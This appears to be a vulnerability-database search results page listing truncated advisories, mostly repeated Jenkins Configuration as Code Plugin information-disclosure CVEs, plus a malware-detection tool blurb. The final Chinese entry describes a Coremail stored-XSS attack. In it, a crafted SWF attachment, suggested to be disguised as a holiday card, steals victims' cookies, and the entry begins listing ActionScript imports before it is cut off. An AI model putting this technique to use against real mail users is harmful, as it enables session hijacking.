115 matches found
CloudBees Jenkins Configuration as Code Plugin Information Disclosure Vulnerability (CNVD-2019-42749)
CloudBees Jenkins Hudson Labs is the United States CloudBees company's set of Java-based development of continuous integration tools. The product is mainly used to monitor the continuous software release/testing projects and some timed tasks . Configuration as Code Plugin is used in which a Jenki...
PT-2019-11758 · Jenkins · Jenkins Configuration As Code Plugin +1
Name of the Vulnerable Software and Affected Versions: Jenkins Configuration as Code Plugin versions 1.24 and earlier Description: The issue allows attackers with permission to change Jenkins system configuration to obtain the values of environment variables due to variable interpolation during...
CloudBees Jenkins Configuration as Code Plugin Information Disclosure Vulnerability
CloudBees Jenkins formerly known as Hudson Labs is the United States CloudBees company's set of Java-based development of continuous integration tools , it is mainly used to monitor the continuous software version of the release/testing project and some of the timed execution of the task...
CloudBees Jenkins Configuration as Code Plugin Information Disclosure Vulnerability
CloudBees Jenkins formerly known as Hudson Labs is the United States CloudBees company's set of Java-based development of continuous integration tools , it is mainly used to monitor the continuous software version of the release/testing project and some of the timed execution of the task...
Design/Logic Flaw
A exposure of sensitive information vulnerability exists in Jenkins Configuration as Code Plugin 0.7-alpha and earlier in DataBoundConfigurator.java, Attribute.java, BaseConfigurator.java, ExtensionConfigurator.java that allows attackers with access to Jenkins log files to obtain the passwords...
Design/Logic Flaw
A exposure of sensitive information vulnerability exists in Jenkins Configuration as Code Plugin 0.7-alpha and earlier in ConfigurationAsCode.java that allows attackers with Overall/Read access to obtain the YAML export of the Jenkins configuration...
CVE-2018-1000610
A exposure of sensitive information vulnerability exists in Jenkins Configuration as Code Plugin 0.7-alpha and earlier in DataBoundConfigurator.java, Attribute.java, BaseConfigurator.java, ExtensionConfigurator.java that allows attackers with access to Jenkins log files to obtain the passwords...
CVE-2018-1000609
A exposure of sensitive information vulnerability exists in Jenkins Configuration as Code Plugin 0.7-alpha and earlier in ConfigurationAsCode.java that allows attackers with Overall/Read access to obtain the YAML export of the Jenkins configuration...
CVE-2018-1000609
A exposure of sensitive information vulnerability exists in Jenkins Configuration as Code Plugin 0.7-alpha and earlier in ConfigurationAsCode.java that allows attackers with Overall/Read access to obtain the YAML export of the Jenkins configuration...
CVE-2018-1000610
A exposure of sensitive information vulnerability exists in Jenkins Configuration as Code Plugin 0.7-alpha and earlier in DataBoundConfigurator.java, Attribute.java, BaseConfigurator.java, ExtensionConfigurator.java that allows attackers with access to Jenkins log files to obtain the passwords...
CVE-2018-1000610
The CVE-2018-1000610 entry concerns the Jenkins Configuration as Code Plugin (0.7-alpha and earlier). The vulnerability arises from insecure handling of passwords configured via the plugin, specifically in DataBoundConfigurator.java, Attribute.java, BaseConfigurator.java, and ExtensionConfigurato...
CVE-2018-1000609
The CVE-2018-1000609 issue affects Jenkins Configuration as Code Plugin (0.7-alpha and earlier). The vulnerability arises from ConfigurationAsCode.java, allowing users with Overall/Read access to export the Jenkins YAML configuration, exposing sensitive information. Impact is exposure of configur...
CVE-2018-1000609
A exposure of sensitive information vulnerability exists in Jenkins Configuration as Code Plugin 0.7-alpha and earlier in ConfigurationAsCode.java that allows attackers with Overall/Read access to obtain the YAML export of the Jenkins configuration...
BinaryAlert - Serverless, Real-time & Retroactive Malware Detection
BinaryAlert is an open-source serverless AWS pipeline where any file uploaded to an S3 bucket is immediately scanned with a configurable set of YARA rules. An alert will fire as soon as any match is found, giving an incident response team the ability to quickly contain the threat before it spread...
Coremail邮件系统存储型XSS之二
简要描述: 设计错误导致可执行恶意JavaScript代码并窃取用户cookies 详细说明: 将特制的swf文件作为附件发送给受害者(这里可以选择在过节的时候下手,比如将文件名改称新年贺卡.swf): swf文件的AS代码如下(将就着看吧,东拼西凑整出来的): package import flash.external.ExternalInterface; import flash.display.Sprite; import flash.display.Sprite; import flash.events.Event; import flash.net.URLLoader;...